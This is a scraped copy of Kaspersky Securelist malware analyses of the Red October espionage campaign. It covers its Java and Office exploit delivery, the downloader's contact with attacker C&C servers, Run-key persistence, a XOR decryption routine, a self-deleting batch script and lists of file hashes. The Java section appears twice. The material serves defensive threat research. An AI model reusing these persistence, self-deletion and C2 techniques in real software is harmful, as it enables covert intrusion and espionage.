Embed Size (px)
Citation preview
Red October - Java Exploit Delivery Vector Analysis -SecurelistИсточник: http://www.securelist.com/en/blog/208194086/Red_October_Java_Exploit_Delivery_Vector_Analysis
GReATKaspersky Lab ExpertPosted January 16, 13:00 GMTTags: Targeted Attacks, Cyber espionage, Vulnerabilities and exploits,Spearphishing
Red October - Java Exploit Delivery Vector Analysis 0.6
Since the publication of our report, our colleagues from Seculert have discovered and posted a blog about the usage ofanother delivery vector in the Red October attacks.
In addition to Office documents (CVE-2009-3129, CVE-2010-3333, CVE-2012-0158), it appears that the attackers alsoinfiltrated victim network(s) via Java exploitation (MD5: 35f1572eb7759cb7a66ca459c093e8a1 - 'NewsFinder.jar'), knownas the 'Rhino' exploit (CVE-2011-3544).
We know the early February 2012 timeframe that they would have used this technique, and this exploit use is consistentwith their approach in that it's not 0-day. Most likely, a link to the site was emailed to potential victims, and the victimsystems were running an outdated version of Java.
However, it seems that this vector was not heavily used by the group. When we downloaded the php responsible forserving the '.jar' malcode archive, the line of code delivering the java exploit was commented out. Also, the related links,java, and the executable payload are proving difficult to track down to this point.
The domain involved in the attack is presented only once in a public sandbox at malwr.com(http://malwr.com/analysis/c3b0d1403ba35c3aba8f4529f43fb300/), and only on February 14th, the very same day that theyregistered the domain hotinfonews.com:
Domain Name: HOTINFONEWS.COMRegistrant:Privat PersonDenis Gozolov ([email protected])Narva mnt 27TallinnTallinn,10120EETel. +372.54055298Creation Date: 14-Feb-2012Expiration Date: 14-Feb-2013
Following that quick public disclosure, related MD5s and links do not show up in public or private repositories, unlike themany other Red October components.
We could speculate that the group successfully delivered their malware payload to the appropriate target(s) for a few days,then didn't need the effort any longer. Which may also tell us that this group, which meticulously adapted and developedtheir infiltration and collection toolset to their victims' environment, had a need to shift to Java from their usualspearphishing techniques in early February 2012. And then they went back to their spear phishing.
Also of note, there was a log recording three separate victim systems behind an IP address in the US, each connectingwith a governmental economic research institute in the Middle East.
So, this Java Rhino exploit appears to be of limited use. And, the functionality embedded on the server side PHP script thatdelivers this file is very different from the common and related functionality that we see in the backdoors used throughoutthe five year campaign.
The crypto routines maintained and delivered within the exploit itself are configured such that the key used to decrypt theURL strings within the exploit is delivered within the Java applet itself. Here is our PHP encryption routine to encrypt theUrl for the downloader content:
And this is the function to embed the applet in the HTML, passing the encrypted URL string through parameter 'p':
Here is the code within the applet that consumes the encrypted strings and uses it. The resulting functionality downloadsthe file from the URL and writes it to 'javaln.exe'. Notice that the strb and stra variables maintain the same strings as the$files and $charset variables in the php script:
This "transfer" decryption routine returns a URL that is concatenated with the other variables, resulting in"hXXp://www.hotinfonews.com/news/dailynews2.php?id=&t=win". It is this content that is written to disk and executed onthe victim's machine. A description of that downloader follows. It is most interesting that this exploit/php combination'sencryption routine is different from the obfuscation commonly used throughout Red October modules. It further suggests
that potentially this limited use package was developed separately from the rest for a specific target.
2nd stage of the attack: EXE, downloaderThe second stage of the attack is downloaded from "http://www.hotinfonews.com/news/dailynews2.php" and executed bythe payload of the Java exploit. It acts as a downloader for the next stage of the attack.
Known file location: %TEMP%\javaln.exeMD5: c3b0d1403ba35c3aba8f4529f43fb300
The file is a PE EXE file, compiled with Microsoft Visual Studio 2008 on 2012.02.06. The file is protected by an obfuscationlayer, the same as used in many Red October modules.
Obfuscation layer disassembled
The module creates a mutex named "MtxJavaUpdateSln" and exits if it already exists. After that, it sleeps for 79 seconds and then creates one of the following registry values to be loaded automatically onstartup:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]JavaUpdateSln=%full path to own executable%
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]JavaUpdateSln=%full path to own executable%
Then, after a 49 second delay, it enters an infinite loop waiting for a working Internet connection. Every 67 seconds itsends a HTTP POST request to the following sites:
www.microsoft.comupdate.microsoft.comwww.google.com
Once a valid connection is established, it continues to its main loop.
C&C server connection loopEvery 180 seconds the module sends a HTTP POST request to its C&C server. The request is sent to a hardcoded URL: www.dailyinfonews.net/reportdatas.php
The contents of the post request follow the following format:
id=%unique user ID, retrieved from the overlay of the file%&A=%integer, indicates whether the autorun registry key was written%&B=%0 or 1, indicates if user has administrative rights%&C=%integer, level of privilege assigned to the current user%
00000000 50 4f 53 54 20 68 74 74 70 3a 2f 2f 77 77 77 2e |POST http://www.|00000010 64 61 69 6c 79 69 6e 66 6f 6e 65 77 73 2e 6e 65 |dailyinfonews.ne|00000020 74 3a 38 30 2f 72 65 70 6f 72 74 64 61 74 61 73 |t:80/reportdatas|00000030 2e 70 68 70 20 48 54 54 50 2f 31 2e 30 0d 0a 48 |.php HTTP/1.0..H|00000040 6f 73 74 3a 20 77 77 77 2e 64 61 69 6c 79 69 6e |ost: www.dailyin|00000050 66 6f 6e 65 77 73 2e 6e 65 74 3a 38 30 0d 0a 43 |fonews.net:80..C|00000060 6f 6e 74 65 6e 74 2d 6c 65 6e 67 74 68 3a 20 36 |ontent-length: 6|00000070 32 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a |2..Content-Type:|00000080 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 77 | application/x-w|00000090 77 77 2d 66 6f 72 6d 2d 75 72 6c 65 6e 63 6f 64 |ww-form-urlencod|000000a0 65 64 0d 0a 0d 0a 69 64 3d 41 41 41 39 33 39 35 |ed....id=AAA9395|000000b0 37 35 32 39 35 33 31 32 35 30 35 31 34 30 32 36 |7529531250514026|000000c0 31 30 30 36 43 43 43 39 33 33 30 30 39 42 42 42 |1006CCC933009BBB|000000d0 31 36 35 34 31 35 31 33 26 41 3d 31 26 42 3d 31 |16541513&A=1&B=1|000000e0 26 43 3d 32 |&C=2|
HTTP POST request sent to the C&C server
The module decrypts the C&C response with AMPRNG algorithm using a hardcoded key. Then, it checks if there is a validEXE signature ("MZ") at offset 37 in the decrypted buffer. If the signature is present, it writes the EXE file to"%TEMP%\nvsvc%p%p.exe" (%p depends on system time) and executes it.
3rd stage of the attack: EXE, unknownCurrently, the C&C server is unavailable and we do not have the executables that were served to the "javaln.exe"downloader. Most likely, they were the actual droppers, similar to the ones used with Word and Excel exploits.
ConclusionsAs more information about the Red October becomes available and third parties are publishing their own research into theattacks, it becomes clear that the scope of the operation is bigger than originally thought.
In addition to the Java exploit presented here, it's possible that other delivery mechanisms were used during the 5 yearssince this gang was active. For instance, we haven't seen any PDF exploits yet, which are very popular with other groups -an unusual thing.
We will continue to monitor the situation and publish updates as the story uncovers.
“Red October”. Detailed Malware Description 1. FirstStage of Attack - SecurelistИсточник: http://www.securelist.com/en/analysis/204792265/Red_October_Detailed_Malware_Description_1_First_Stage_of_Attack
“Red October”. Detailed Malware Description 1. First Stage of AttackFirst stage of attack
1. Exploits2. Dropper3. Loader Module4. Main component
Second stage of attack1. Modules, general overview2. Recon group3. Password group4. Email group5. USB drive group6. Keyboard group7. Persistence group8. Spreading group9. Mobile group
10. Exfiltration group
1. ExploitsBased on the analysis of known cases, we identified two main ways through which Backdoor.Win32.Sputnik infects thevictims. Both methods rely on spear-phishing e-mails which are sent to the prospective victims. The e-mails contain anattachment which is either an Excel or Word document, with enticing names. In addition to Office documents (CVE-2009-3129, CVE-2010-3333, CVE-2012-0158), it appears that the attackers also infiltrated victim network(s) via Java exploitation(MD5:35f1572eb7759cb7a66ca459c093e8a1 - 'NewsFinder.jar'), known as the 'Rhino' exploit (CVE-2011-3544).
The Red October infection diagram
The Excel-based exploit - CVE-2009-3129This is the oldest known way for Red October to infect computers.
A list of some of the Excel file names can be found below:
File name: MD5:
Katyn_-_opinia_Rosjan.xls bd05475a538c996cd6cafe72f3a98fae
WORK PLAN (APRIL-JUNE 2011).xls f16785fc3650490604ab635303e61de2
EEAS-Staff New contact list (05-25-2011).xls 5f9b7a70ca665a54f8879a6a16f6adde
"tactlist_05-05-2011_.8634.xls EEAS New contact list (05-05-2011).xls " bb2f6240402f765a9d0d650b79cd2560
Agenda Telefoane institutii si ministere 2011.xls 4bfa449f1a351210d3c5b03ac2bd18b1
Agenda Telefoane institutii si ministere 2011 (2).xls 4ce5fd18b1d3f551a098bb26d8347ffb
FIEO contacts update.xls ec98640c401e296a76ab7f213164ef8c
spisok sotrudnikov.xls d98378db4016404ac558f9733e906b2b
List of shahids.xls dc4a977eaa2b62ad7785b46b40c61281
Spravochnik.xls 5ecec03853616e13475ac20a0ef987b6
Agenda Telefoane&Email institutii si ministere 2011.xls de56229f497bf51274280ef84277ea54
EEAS New contact list (05-05-2011) (2).xls 396d9e339c1fd2e787d885a688d5c646
FIEO contacts update.xls 7e5d9b496306b558ba04e5a4c5638f9f
Telephone.xls c42627a677e0a6244b84aa977fbea15d
List of shahids.xls 1f86299628bed519718478739b0e4b0c
BMAC Attache List - At 11 Oct_v1[1].XLS f0357f969fbaf798095b43c9e7a0cfa7
MERCOSUR_Imports.xls 50bd553568422cf547539dd1f49dd80d
Cópia de guia de telefonos (2).xls cee7bd726bc57e601c85203c5767293c
Programme de fetes 2011.xls ceac9d75b8920323477e8a4acdae2803
12 05 2011 updated.xls 639760784b3e26c1fe619e5df7d0f674
telefonebi.xls d71a9d26d4bb3b0ed189c79cd24d179a
telefonebi.xls dc8f0d4ecda437c3f870cd17d010a3f6
The Excel based exploit is detected by Kaspersky products as Trojan-Dropper.MSWord.Agent.ga. It was apparently usedmostly in 2011, with several samples being uploaded to VirusTotal by the victims. For a detection link of various products,check:
https://www.virustotal.com/file/afaebb8055559ea6bf88cedcd6fc7b93f02cde31a560876bcc4860fd0686739d/analysis
Several detections include:
Kaspersky Trojan-Dropper.MSWord.Agent.ga 20120808
McAfee Exploit-MSExcel.u 20120808
Microsoft Exploit:Win32/CVE-2009-3129 20120808
Symantec Bloodhound.Exploit.306 20120808
TrendMicro HEUR_OLEXP.B 20120808
The Excel file properties for all the exploits indicate it has been edited on a system with Simplified Chinese Excel. Theexploit appears to have been compiled on 26 Nov 2009:
EXIF METADATA ============= MIMEType : application/vnd.ms-excelCompany : ModifyDate : 2009:11:26 03:35:15TitleOfParts : Sheet1SharedDoc : NoAuthor : CodePage : Windows Simplified Chinese (PRC, Singapore)Title : AppVersion : 11.9999LinksUpToDate : NoScaleCrop : NoLastModifiedBy : qqHeadingPairs : ??????, 1
HyperlinksChanged : NoCreateDate : 1996:12:17 01:32:42Security : NoneFileType : XLSSoftware : Microsoft Excel
The exact exploit type used by Red October in the XLS files is CVE-2009-3129.
Exploit (CVE-2009-3129) information:“Microsoft Office Excel 2002 SP3, 2003 SP3, and 2007 SP1 and SP2; Office 2004 and 2008 for Mac; Open XML FileFormat Converter for Mac; Office Excel Viewer 2003 SP3; Office Excel Viewer SP1 and SP2; and Office CompatibilityPack for Word, Excel, and PowerPoint 2007 File Formats SP1 and SP2 allows remote attackers to execute arbitrary codevia a spreadsheet with a FEATHEADER record containing an invalid cbHdrData size element that affects a pointer offset,aka "Excel Featheader Record Memory Corruption Vulnerability."
US-CERT info: https://www.us-cert.gov/cas/techalerts/TA09-314A.html
Patch: http://technet.microsoft.com/en-us/security/bulletin/ms09-nov
The vulnerability exploited by the Red October XLS dropper has been patched by Microsoft in November 2009.
The CVE-2009-3129 exploit and shellcode
Shellcode decryptor in XLS files
The Red October XLS CVE-2009-3129 exploit appears to have been originally developed by Chinese hackers. It was alsoused in other, unrelated attacks against Tibetan activists and other entities. Its main purpose is to drop and execute aTrojan, which for Red October is in the range of 500-600kB.
The shellcode receives control upon successful exploitation of the vulnerability and proceeds to decrypt itself. Oncedecrypted, the shellcode in turn decrypts the main malware body (at offset 0x6600 in the XLS files). The malware is storedin the Excel file at offset 0x6600, in encrypted form:
Encrypted malware payload in XLS files
The malware is encrypted with a simple XOR+ROR algorithm:
void decrypt(unsigned char *tbuf, unsigned long n, int round) { unsigned char b;long i;unsigned short ecx=0x400;unsigned char a;a=6;for (i=0;i<1024;i++) {b=tbuf[i];b=b^ecx;b = (b>>a) | (b<<(8-a));tbuf[i]=b;ecx--;}}
The shellcode writes the main “top” Trojan dropper to a file named “Dcs.tmp” and runs it. It will also extract a dummy Excelfile which will be shown to the user if the exploit was successful. The dummy Excel is named “~ .xls”.
The Word-based exploit – CVE-2010-3333The CVE-2010-3333 Word-based exploit (RTF files) has been observed in September and October 2012. Examplefilename / MD5 list related to the attack:
File name: MD5:
arexeio1.doc cb51ef3e541e060f0c56ac10adef37c3
Popa Tatiana -plîngere.doc 6B23732895DAAAD4BD6EAE1D0B0FEF08
La Política de Defensa y el Poder Naval en México OTAN (1).doc 44E70BCE66CDAC5DC06D5C0D6780BA45
Iran, Syria and the balance of power in the Middle East.doc 9F470A4B0F9827D0D3AE463F44B227DB
Diplomatic Staff list.doc 91EBC2B587A14EC914DD74F4CFB8DD0F
Diplomatic Car for Sale - MB 2000.doc 85BAEBED3D22FA63CE91FFAFCD7CC991
Rulers have hostaged parliament to further their personal interest (1).doc B9238737D22A059FF8DA903FBC69C352
Итоги президенства В.Януковича.doc 2672FBBA23BF4F5E139B10CACC837E9F
the wife of Ambassador-2.doc 65D277AF039004146061FF01BB757A8F
Вожможные стратегические решения.doc 731C68D2335E60107DF2F5AF18B9F4C9
31086823_cm04639-re02 en12.doc 9B55887B3E0C7F1E41D1ABDC32667A93
16 октября 2012 года (дополнение).doc A7330CE1B0F89AC157E335DA825B22C7
delegat.doc FC3C874BDAEDF731439BBE28FC2E6BBE
Davos2011_follow-up plan_heregjilt.doc 9950A027191C4930909CA23608D464CC
Participant list 6th Forum 09-12 update.doc C78253AEFCB35F94ACC63585D7BFB176
Draft 3_Conference Renewable energy cooperation and Grid integration.doc 5D1121EAC9021B5B01570FB58E7D4622
The Word based exploit is detected by Kaspersky products as Exploit.MSWord.CVE-2010-3333.bw. It was apparently usedmostly in 2012 (eg. October 2012), with one sample being uploaded to VirusTotal, probably by one of the victims. For adetection link of various products, check:
https://www.virustotal.com/file/5fe53a960bc2031a185c575ea05ac466f26739a34c651c14260e4cfbc123e87f/analysis/
Several detections include:
Kaspersky Exploit.MSWord.CVE-2010-3333.bw 20121012
McAfee - 20121012
Microsoft Exploit:Win32/CVE-2010-3333 20121012
Symantec - 20121012
TrendMicro - 20121012
The dropper is in fact an RTF file, with “author John Doe”, supposedly created by “mocrosoft office word Msfedit5.1.21.2500”.
The same exploit / dropper have been observed in many other targeted attacks against for instance Tibetan activists. Itappears to be of Chinese origin just as the XLS exploit.
The exact exploit type used by Red October in these RTF files is CVE-2010-3333.
Exploit (CVE-2010-3333) information:“Stack-based buffer overflow in Microsoft Office XP SP3, Office 2003 SP3, Office 2007 SP2, Office 2010, Office 2004 and2008 for Mac, Office for Mac 2011, and Open XML File Format Converter for Mac allows remote attackers to executearbitrary code via crafted RTF data, aka "RTF Stack Buffer Overflow Vulnerability."
MITRE: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3333CERT: http://www.us-cert.gov/cas/techalerts/TA10-313A.htmlMicrosoft: http://technet.microsoft.com/en-us/security/bulletin/ms10-nov
The vulnerability exploited by Red October’s RTF documents was patched by Microsoft in November 2010.
The CVE-2010-3333 exploit and shellcode
The RTF file acts as a dropper for the main Trojan body. It also contains a fake document which is shown to the user incase the exploit is successful.
Encrypted trojan body inside RTF files
The main Trojan body is encrypted “XOR 0xFB” and stored as hex text inside the RTF file. The shellcode decrypts themain body and executes it.
The Word-based exploit – CVE-2012-0158In November 2012 we’ve noticed new attacks using document files that exploit CVE-2012-0158. This exploit has beenextremely popular with APT attacks during 2012 so it’s perhaps no surprise it was also adopted by the Red October gang.
Example filename / MD5 list related to the attack:
File name: MD5:
Mazda.doc 93d0222c8c7b57d38931cfd712523c67
Komorowski.doc 51edea56c1e83bcbc9f873168e2370af
Commercial Report for October.doc 114ed0e5298149fc69f6e41566e3717a
Russian terrorist attack.doc 350c170870e42dce1715a188ca20d73b
FLOC-meeting.doc 4daa2e7d3ac1a5c6b81a92f4a9ac21f1
3037.doc 82e518fb3a6749903c8dc17287cebbf8
8th_2012 Minutes of meeting.doc 3ded9a0dd566215f04e05340ccf20e0c
The CVE-2012-0158 exploit used in these attacks is mostly undetected by antivirus products at the time of writing of thisreport. Kaspersky Lab products catch and block the exploit using the state of the art “Automatic Exploit Prevention”technology.
The same exploit / dropper have been observed in many other targeted attacks against for instance Tibetan activists. Itappears to be of Chinese origin just as the other exploits.
The exact exploit type used by Red October in these RTF files is CVE-2012-0158.
Exploit (CVE-2012-0158) information:
“The (1) ListView, (2) ListView2, (3) TreeView, and (4) TreeView2 ActiveX controls in MSCOMCTL.OCX in the CommonControls in Microsoft Office 2003 SP3, 2007 SP2 and SP3, and 2010 Gold and SP1; Office 2003 Web Components SP3;SQL Server 2000 SP4, 2005 SP4, and 2008 SP2, SP3, and R2; BizTalk Server 2002 SP1; Commerce Server 2002 SP4,2007 SP2, and 2009 Gold and R2; Visual FoxPro 8.0 SP1 and 9.0 SP2; and Visual Basic 6.0 Runtime allow remoteattackers to execute arbitrary code via a crafted (a) web site, (b) Office document, or (c) .rtf file that triggers "system state"corruption, as exploited in the wild in April 2012, aka "MSCOMCTL.OCX RCE Vulnerability.""
NIST: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0158Microsoft: http://technet.microsoft.com/en-us/security/bulletin/ms12-027
The vulnerability exploited by these Red October RTF documents was patched by Microsoft in April 2012.
The CVE-2012-0158 exploit and shellcodeThe RTF file acts as a dropper for the main Trojan body. It also contains a fake document which is shown to the user incase the exploit is successful.
Encrypted Trojan dropper body in RTF files with CVE-2012-0158
The main Trojan body is encrypted “XOR 0xDE” and stored as hex text inside the RTF file. The shellcode simply writes themain dropper to a file named “msmx21.exe” in the %TEMP% folder and runs it. It also extracts a fake document which isshown to the victim if the exploit has been successful.
Fake document shown to the victim if exploit is successful
The Java based exploit - CVE-2011-3544Since the publication of our report, our colleagues from Seculert have discovered and posted a blog about the usage ofanother delivery vector in the Red October attacks.
In addition to Office documents (CVE-2009-3129, CVE-2010-3333, CVE-2012-0158), it appears that the attackers alsoinfiltrated victim network(s) via Java exploitation (MD5: 35f1572eb7759cb7a66ca459c093e8a1 - 'NewsFinder.jar'), knownas the 'Rhino' exploit (CVE-2011-3544).
We know the early February 2012 timeframe that they would have used this technique, and this exploit use is consistentwith their approach in that it's not 0-day. Most likely, a link to the site was emailed to potential victims, and the victimsystems were running an outdated version of Java.
However, it seems that this vector was not heavily used by the group. When we downloaded the php responsible forserving the '.jar' malcode archive, the line of code delivering the java exploit was commented out. Also, the related links,java, and the executable payload are proving difficult to track down to this point.
The domain involved in the attack is presented only once in a public sandbox at malwr.com(http://malwr.com/analysis/c3b0d1403ba35c3aba8f4529f43fb300/), and only on February 14th, the very same day that theyregistered the domain hotinfonews.com:
Domain Name: HOTINFONEWS.COMRegistrant:Privat PersonDenis Gozolov ([email protected])
Narva mnt 27TallinnTallinn,10120EETel. +372.54055298Creation Date: 14-Feb-2012Expiration Date: 14-Feb-2013
Following that quick public disclosure, related MD5s and links do not show up in public or private repositories, unlike themany other Red October components.
We could speculate that the group successfully delivered their malware payload to the appropriate target(s) for a few days,then didn't need the effort any longer. Which may also tell us that this group, which meticulously adapted and developedtheir infiltration and collection toolset to their victims' environment, had a need to shift to Java from their usualspearphishing techniques in early February 2012. And then they went back to their spear phishing.
Also of note, there was a log recording three separate victim systems behind an IP address in the US, each connectingwith a governmental economic research institute in the Middle East.
So, this Java Rhino exploit appears to be of limited use. And, the functionality embedded on the server side PHP script thatdelivers this file is very different from the common and related functionality that we see in the backdoors used throughoutthe five year campaign.
The crypto routines maintained and delivered within the exploit itself are configured such that the key used to decrypt theURL strings within the exploit is delivered within the Java applet itself. Here is our PHP encryption routine to encrypt theUrl for the downloader content:
And this is the function to embed the applet in the HTML, passing the encrypted URL string through parameter 'p':
Here is the code within the applet that consumes the encrypted strings and uses it. The resulting functionality downloadsthe file from the URL and writes it to 'javaln.exe'. Notice that the strb and stra variables maintain the same strings as the$files and $charset variables in the php script:
This "transfer" decryption routine returns a URL that is concatenated with the other variables, resulting in"hXXp://www.hotinfonews.com/news/dailynews2.php?id=&t=win". It is this content that is written to disk and executed onthe victim's machine. A description of that downloader follows. It is most interesting that this exploit/php combination'sencryption routine is different from the obfuscation commonly used throughout Red October modules. It further suggeststhat potentially this limited use package was developed separately from the rest for a specific target.
2nd stage of the Java exploit attack: EXE, downloaderThe second stage of the attack is downloaded from "http://www.hotinfonews.com/news/dailynews2.php" and executed bythe payload of the Java exploit. It acts as a downloader for the next stage of the attack.
Known file location: %TEMP%\javaln.exeMD5: c3b0d1403ba35c3aba8f4529f43fb300
The file is a PE EXE file, compiled with Microsoft Visual Studio 2008 on 2012.02.06. The file is protected by an obfuscationlayer, the same as used in many Red October modules.
Obfuscation layer disassembled
The module creates a mutex named "MtxJavaUpdateSln" and exits if it already exists. After that, it sleeps for 79 seconds and then creates one of the following registry values to be loaded automatically onstartup:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]JavaUpdateSln=%full path to own executable%
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]JavaUpdateSln=%full path to own executable%
Then, after a 49 second delay, it enters an infinite loop waiting for a working Internet connection. Every 67 seconds itsends a HTTP POST request to the following sites:
www.microsoft.comupdate.microsoft.comwww.google.com
Once a valid connection is established, it continues to its main loop.
C&C server connection loopEvery 180 seconds the module sends a HTTP POST request to its C&C server. The request is sent to a hardcoded URL: www.dailyinfonews.net/reportdatas.php
The contents of the post request follow the following format:
id=%unique user ID, retrieved from the overlay of the file%&A=%integer, indicates whether the autorun registry key was written%&B=%0 or 1, indicates if user has administrative rights%&C=%integer, level of privilege assigned to the current user%
00000000 50 4f 53 54 20 68 74 74 70 3a 2f 2f 77 77 77 2e |POST http://www.|00000010 64 61 69 6c 79 69 6e 66 6f 6e 65 77 73 2e 6e 65 |dailyinfonews.ne|00000020 74 3a 38 30 2f 72 65 70 6f 72 74 64 61 74 61 73 |t:80/reportdatas|00000030 2e 70 68 70 20 48 54 54 50 2f 31 2e 30 0d 0a 48 |.php HTTP/1.0..H|00000040 6f 73 74 3a 20 77 77 77 2e 64 61 69 6c 79 69 6e |ost: www.dailyin|00000050 66 6f 6e 65 77 73 2e 6e 65 74 3a 38 30 0d 0a 43 |fonews.net:80..C|00000060 6f 6e 74 65 6e 74 2d 6c 65 6e 67 74 68 3a 20 36 |ontent-length: 6|00000070 32 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a |2..Content-Type:|00000080 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 77 | application/x-w|00000090 77 77 2d 66 6f 72 6d 2d 75 72 6c 65 6e 63 6f 64 |ww-form-urlencod|000000a0 65 64 0d 0a 0d 0a 69 64 3d 41 41 41 39 33 39 35 |ed....id=AAA9395|000000b0 37 35 32 39 35 33 31 32 35 30 35 31 34 30 32 36 |7529531250514026|000000c0 31 30 30 36 43 43 43 39 33 33 30 30 39 42 42 42 |1006CCC933009BBB|000000d0 31 36 35 34 31 35 31 33 26 41 3d 31 26 42 3d 31 |16541513&A=1&B=1|000000e0 26 43 3d 32 |&C=2|
HTTP POST request sent to the C&C server
The module decrypts the C&C response with AMPRNG algorithm using a hardcoded key. Then, it checks if there is a validEXE signature ("MZ") at offset 37 in the decrypted buffer. If the signature is present, it writes the EXE file to"%TEMP%\nvsvc%p%p.exe" (%p depends on system time) and executes it.
3rd stage of the Java exploit attack: EXE, unknownCurrently, the C&C server is unavailable and we do not have the executables that were served to the "javaln.exe"downloader. Most likely, they were the actual droppers, similar to the ones used with Word and Excel exploits.
2. DropperThe dropper module is a PE EXE file, compiled with Microsoft Visual Studio 2008. It is extracted and executed by one ofthe exploits used to deliver the malware to the victim.
Known variants drop and execute the “loader” component named “svchost.exe” or “svclogon.exe” and one encrypted maincomponent file (see description of the “loader” component).
Main functionRegistry key checkThe module generates a CLSID from the value of the SHA1 checksum of the system directory path and the serial numberof the system drive.
Then, it tries to read the default value of the registry key:
HKLM\Software\Classes\CLSID\generated_CLSID (if it has administrative rights)HKCU\Software\Classes\CLSID\generated_CLSID (if it has no administrative rights)
It checks the contents of the default key value. This check succeeds if the registry key is not present or its value is equal tothe last DWORD of the file’s SHA1 checksum. Otherwise the check fails and it runs the check again each 3 millisecondsfor 4294967294 times.
Then, it sets the default value of the registry key to the hexadecimal representation of the value of the last SHA1’s DWORDand tries to read the registry value “InfoTip” from the same registry key. The registry value is assumed to be a 48-bytebinary buffer. It extracts a time parameter from that buffer and self-deletes if the difference between the recorded time andcurrent time is less than 3 days.
This means that the updated modules can be delivered not sooner than in three days to the same victim. If someone triesto reinfect the system with the same dropper, it refuses to do so within 3 days from last infection. This can also be amechanism to escape from attention of power users or administrators who can run recently opened suspicious applicationagain and monitor its activity.
This check is identical to the one implemented in the “loader” module.
Installation routineThe module retrieves its resource of type “AAA” and name “000”. The resource is then decrypted using a custom RC4-likecipher with a hardcoded key.
Offset Type Description
0 DWORD If equal to “1”, the dropper should self-delete and exit after processing the resource
4 DWORD If equal to “1”, the dropper should exit after processing the resource
8 DWORD Delay in milliseconds before processing the resource
The resource header is followed by data entries each containing one file.
Offset Type Description
0 DWORD Record type
4 DWORD Size of the file name in bytes
8 DWORD Size of the file contents
12 DWORD Reserved, equal to 0x7D4
16 BYTE[] File name, Unicode
16 + size of the file name BYTE[] File contents
Every record is processed differently depending on the “Record type” value:
Record type Action
0x07 Write the file to disk
0x08 Write the file to disk and execute immediately with CreateProcess() API
0x090x0A0x0D0x0E
Write to predefined directory: %System Directory%\wmispoold\%file name% (if has administrative rights) %APPDATA%\wmispoold\%file name% (if has user only rights) 0x09 – create new file and write to it0x0A – create new file, write and execute it0x0D – overwrite file0x0E – overwrite and execute fileTries to terminate any running process that belongs to the file being (over)written.
0x0B Write to the first available directory from the hardcoded list (see below)0x0B – write file
0x0C 0x0C – write and execute file
The module sets file creation/modification time equal to the one of the “%windir%\system32\kernel32.dll” file.
For record types 0x0B and 0x0C, the module tries to write the file to the first available directory from the list:
%ProgramFiles%\Windows NT\%APPDATA%\Microsoft\%ProgramFiles%\Windows NT\Accessories\%ProgramFiles%\Windows NT\Pinball\%ProgramFiles%\Windows Media Player\%ProgramFiles%\Web Publish\%ProgramFiles%\Outlook Express\%ProgramFiles%\Microsoft Office\Office10\Data\%ProgramFiles%\Microsoft Office\Office10\%ProgramFiles%\Microsoft Frontpage\%ProgramFiles%\Internet Explorer\%ProgramFiles%\ComPlus Applications\%ProgramFiles%\WindowsUpdate\%CommonProgramFiles%\Microsoft Shared\MsInfo\%CommonProgramFiles%\Microsoft Shared\Office10\%CommonProgramFiles%\Proof\%CommonProgramFiles%\Web Folders\%CommonProgramFiles%\Web Server Extensions\%CommonProgramFiles%\System\ado\%CommonProgramFiles%\System\msadc\%SystemDrive%\Documents and Settings\LocalService\Application Data\Microsoft\ %SystemDrive%\Documents and Settings\LocalService\Local Settings\Application Data\Microsoft\%ALLUSERSPROFILE%\Application Data\%windir%\Installer\%windir%\Help\Tours\mmTour\%windir%\Help\Tours\htmTour\%windir%\Help\Tours\WindowsMediaPlayer\%windir%\IME\%windir%\MsApps\%windir%\MsApps\MsInfo\%windir%\inf\%ALLUSERSPROFILE%\Application Data\Microsoft\%ALLUSERSPROFILE%\Application Data\Microsoft\Office\%ALLUSERSPROFILE%\Application Data\Microsoft\Office\Data\%ALLUSERSPROFILE%\Application Data\Microsoft\Windows\%HOMEPATH%\Local Settings\%APPDATA%\%APPDATA%\Microsoft\Office\%APPDATA%\Microsoft\Office\Data\%APPDATA%\Microsoft\Windows\%windir%\Temp\%TMP%\%TEMP%\
Post processingThe module deletes the following registry keys:
HKCU\Software\Microsoft\Office\11.0\Word\Resiliency\StartupItemsHKCU\Software\Microsoft\Office\11.0\Word\Resiliency\DisabledItems
This is done to erase the list of Microsoft Word documents that might need recovery, probably to avoid showing up thedocument with exploit again if it crashed Microsoft Word process.
Self removal procedureThe dropper creates a file “%TEMP%\msc.bat”, executes it and exits, effectively self-deleting its body:
chcp 1251:Repeatattrib -a -s -h -r "%path to own executable file%"del "%path to own executable file%"if exist "%path to own executable file%" goto Repeatdel "%path to own executable file%"
Known variants
MD5 Compilation date (source) Compilation date (payload)
D784EAB30F85D2CDFB14ED1B0D98C98C 2011.07.06 07:41:01 (GMT) 2011.03.15 07:43:59 (GMT)
418B7A888484BDCBBA3B431ACC57B6AB 2011.09.22 04:52:59 (GMT) 2011.03.15 07:43:59 (GMT)
5C23DBF7B2BED5D54EADC47889EE1038 2011.06.23 09:53:26 (GMT) 2011.03.15 07:43:59 (GMT)
EA2765A3D9F865EF7546BA7F5F145E95 2011.06.30 08:26:29 (GMT) 2011.03.15 07:43:59 (GMT)
4A5F5C6E1AD30CF2799E3EA13468B3C2 2011.07.07 09:27:34 (GMT) 2011.03.15 07:43:59 (GMT)
A03CCD50DB47361E6BD9B05017372110 2011.04.21 10:47:12 (GMT) 2011.03.15 07:43:59 (GMT)
FA28873EFD2279E9AF79202E9A7E9398 2011.08.16 06:31:24 (GMT) 2011.03.15 07:43:59 (GMT)
4ACE8A18C8710B40FF9B47F29F82EAC7 2011.08.18 06:21:22 (GMT) 2011.03.15 07:43:59 (GMT)
204F7BFA78ED99E623DEF43BA0A188C9 2011.07.20 13:04:53 (GMT) 2011.03.15 07:43:59 (GMT)
35061250A7C580A4CEA31F29E050C4FF 2011.03.14 14:46:51 (GMT) 2011.03.03 12:50:46 (GMT)
58C5D4158DF279E9038344D0B420BEDE 2011.03.14 14:58:56 (GMT) 2011.03.03 12:50:46 (GMT)
24546BB958EDD449408BA1AADDB3DCEB 2011.03.04 11:46:39 (GMT) 2011.03.02 09:45:07 (GMT)
